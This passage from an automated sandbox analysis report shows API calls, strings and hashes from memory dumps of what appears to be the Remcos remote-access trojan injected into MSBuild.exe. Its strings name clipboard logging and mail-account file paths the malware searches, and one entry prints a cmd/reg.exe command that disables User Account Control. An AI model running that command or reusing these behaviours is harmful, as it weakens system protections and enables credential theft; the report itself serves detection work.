• Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
• Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
• Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
• Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$DG
• API String ID: 3554306468-1089238109
• Opcode ID: b1c827c768f8b89385a9e252993ed6dfc40810504ddb71ef3f257848589216b9
• Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
• Opcode Fuzzy Hash: b1c827c768f8b89385a9e252993ed6dfc40810504ddb71ef3f257848589216b9
• Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
APIs
• _strpbrk.LIBCMT ref: 0044D4A8
• _free.LIBCMT ref: 0044D5C5
  • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
  • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
  • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.$u;~/
• API String ID: 2812119850-2875973209
• Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
• Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
• Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
• Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
                                                                                                                                            • _free.LIBCMT ref: 004427DF
                                                                                                                                            • _free.LIBCMT ref: 004427E9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$x7
                                                                                                                                            • API String ID: 2506810119-656177465
                                                                                                                                            • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                                            • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                                            • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                                            • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                            • API String ID: 4036392271-1520055953
                                                                                                                                            • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                            • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                            • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                            • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                                                            • API String ID: 2974294136-753205382
                                                                                                                                            • Opcode ID: c45f1c20ab592c1ac194ba1baf481a8095d28be8187a03407ed9f83d84f8ae17
                                                                                                                                            • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                                                            • Opcode Fuzzy Hash: c45f1c20ab592c1ac194ba1baf481a8095d28be8187a03407ed9f83d84f8ae17
                                                                                                                                            • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                                                            APIs
                                                                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                                                            • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                            • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                                            • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                                            • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                            Strings
                                                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                            • API String ID: 2922976086-4183131282
                                                                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                            • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                            • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                            • String ID: pth_unenc$BG
                                                                                                                                            • API String ID: 1818849710-2233081382
                                                                                                                                            • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                            • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
• SetEvent.KERNEL32(00000284), ref: 00404AF9
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
• CloseHandle.KERNEL32(00000000), ref: 00404B0D
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
• Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
• Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
• Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
• Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
• Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
• Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
• Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• GetProcAddress.KERNEL32(00000000), ref: 00401441
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll$`v
• API String ID: 1646373207-4169404581
• Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
• Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
• Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
• Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 2180151492-0
• Opcode ID: 38b7cc1bcac48a295481161db252efa9018639b129d0edbffe131367ad8f1267
• Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
• Opcode Fuzzy Hash: 38b7cc1bcac48a295481161db252efa9018639b129d0edbffe131367ad8f1267
• Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 1000715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
• _free.LIBCMT ref: 100071B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
• Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
• Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
• Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E144
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
• _free.LIBCMT ref: 0044E1A0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
• Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
• Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
• Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
APIs
• GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
• _free.LIBCMT ref: 10005BB4
• _free.LIBCMT ref: 10005BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
• Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
• Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
• Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
APIs
• GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
• _free.LIBCMT ref: 00446F7D
• _free.LIBCMT ref: 00446FA4
• SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
